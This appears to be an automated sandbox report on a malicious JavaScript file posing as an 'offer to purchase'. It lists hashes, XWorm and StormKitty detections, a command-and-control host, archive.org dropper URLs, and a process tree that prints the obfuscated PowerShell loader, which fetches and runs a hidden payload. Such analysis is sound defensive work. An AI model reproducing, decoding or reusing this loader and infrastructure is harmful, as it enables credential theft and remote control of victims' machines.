Overview

overview

10

Static

static

1

Offertopurchase.js

windows7-x64

10

Offertopurchase.js

windows10-2004-x64

10

Analysis

  • max time kernel
    124s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-08-2024 06:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Offertopurchase.js

  • Size

    329KB

  • MD5

    b4105714b83cef4f0d8d859364cd6322

  • SHA1

    448f53b0c979beb7305db50a282bef00043e6840

  • SHA256

    f7012ceb3f5f17167f1b0eb83dc97b3064ea92dc81d1151a2218112895142afd

  • SHA512

    91a19c5e098351e053de13d4c8ebe3677f2fec4aac7a63169a30ea147c75b0ce734e11011724ff6d7be7e7b2311ce9663ef9b6c52f2172febaca2c2f7cb03f0a

  • SSDEEP

    768:P7rCumqiWTinPK6eOK6mW3XKqe+KqmG9NqaeOqamWX3qKuH+qKmGxBK6eOK6mW3G:rdvJ5strohpUtg1vx

Score
10/10
stormkittyxwormcredential_accessdiscoveryexecutionpersistenceratstealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
exe.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Extracted

Family

xworm

Version

5.0

C2

christyrusike21.duckdns.org:7000

Mutex

znkTtudE0WUuGVBW

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Offertopurchase.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2428
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´YQBn䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´VQBy䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´JwBo䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bw䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´Og䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´aQBh䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´M䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´x䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´M䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´dQBz䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´YQBy䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´HY䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´cgBn䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´MQ䷡ ㌝ ₋ ⊩ ´w䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´aQB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bQBz䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bo䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´bwB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´Xw䷡ ㌝ ₋ ⊩ ´y䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´0䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Nw䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQBh䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´Bu䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´agBw䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´dwBl䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´QwBs䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´ZQBu䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´TgBl䷡ ㌝ ₋ ⊩ ´Hc䷡ ㌝ ₋ ⊩ ´LQBP䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´agBl䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´eQBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´TgBl䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´LgBX䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´YgBD䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´aQBl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´aQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´ZwBl䷡ ㌝ ₋ ⊩ ´EI䷡ ㌝ ₋ ⊩ ´eQB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cw䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Hc䷡ ㌝ ₋ ⊩ ´ZQBi䷡ ㌝ ₋ ⊩ ´EM䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bgB0䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´R䷡ ㌝ ₋ ⊩ ´Bv䷡ ㌝ ₋ ⊩ ´Hc䷡ ㌝ ₋ ⊩ ´bgBs䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´YQBk䷡ ㌝ ₋ ⊩ ´EQ䷡ ㌝ ₋ ⊩ ´YQB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´K䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bQBh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´ZQBV䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´p䷡ ㌝ ₋ ⊩ ´Ds䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´YQBn䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´V䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´Bb䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´eQBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´V䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´EU䷡ ㌝ ₋ ⊩ ´bgBj䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´ZwBd䷡ ㌝ ₋ ⊩ ´Do䷡ ㌝ ₋ ⊩ ´OgBV䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´Rg䷡ ㌝ ₋ ⊩ ´4䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´RwBl䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´UwB0䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´aQBu䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´K䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bQBh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´ZQBC䷡ ㌝ ₋ ⊩ ´Hk䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´KQ䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´EY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´8䷡ ㌝ ₋ ⊩ ´Dw䷡ ㌝ ₋ ⊩ ´QgBB䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´RQ䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´DQ䷡ ㌝ ₋ ⊩ ´XwBT䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´QQBS䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´Pg䷡ ㌝ ₋ ⊩ ´+䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´Ow䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´EY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´8䷡ ㌝ ₋ ⊩ ´Dw䷡ ㌝ ₋ ⊩ ´QgBB䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´RQ䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´DQ䷡ ㌝ ₋ ⊩ ´XwBF䷡ ㌝ ₋ ⊩ ´E4䷡ ㌝ ₋ ⊩ ´R䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´+䷡ ㌝ ₋ ⊩ ´D4䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bQBh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´ZQBU䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´B0䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´SQBu䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´E8䷡ ㌝ ₋ ⊩ ´Zg䷡ ㌝ ₋ ⊩ ´o䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´EY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´KQ䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´ZQBu䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´SQBu䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´aQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´ZwBl䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´LgBJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´TwBm䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´BG䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´YQBn䷡ ㌝ ₋ ⊩ ´Ck䷡ ㌝ ₋ ⊩ ´Ow䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´BJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´BJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cs䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´EY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´LgBM䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bgBn䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´YgBh䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´DQ䷡ ㌝ ₋ ⊩ ´T䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´ZwB0䷡ ㌝ ₋ ⊩ ´Gg䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´BJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´YQBy䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´SQBu䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´Ds䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bi䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cwBl䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´N䷡ ㌝ ₋ ⊩ ´BD䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´aQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´ZwBl䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´LgBT䷡ ㌝ ₋ ⊩ ´HU䷡ ㌝ ₋ ⊩ ´YgBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´cgBp䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Zw䷡ ㌝ ₋ ⊩ ´o䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´s䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bi䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cwBl䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´N䷡ ㌝ ₋ ⊩ ´BM䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bgBn䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´p䷡ ㌝ ₋ ⊩ ´Ds䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bj䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´EI䷡ ㌝ ₋ ⊩ ´eQB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cw䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´Bb䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´eQBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´QwBv䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´dgBl䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bd䷡ ㌝ ₋ ⊩ ´Do䷡ ㌝ ₋ ⊩ ´OgBG䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´bwBt䷡ ㌝ ₋ ⊩ ´EI䷡ ㌝ ₋ ⊩ ´YQBz䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´Ng䷡ ㌝ ₋ ⊩ ´0䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´By䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bgBn䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bi䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cwBl䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´N䷡ ㌝ ₋ ⊩ ´BD䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´Ck䷡ ㌝ ₋ ⊩ ´Ow䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´bwBh䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQBk䷡ ㌝ ₋ ⊩ ´EE䷡ ㌝ ₋ ⊩ ´cwBz䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bQBi䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´eQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´Bb䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´eQBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´UgBl䷡ ㌝ ₋ ⊩ ´GY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ 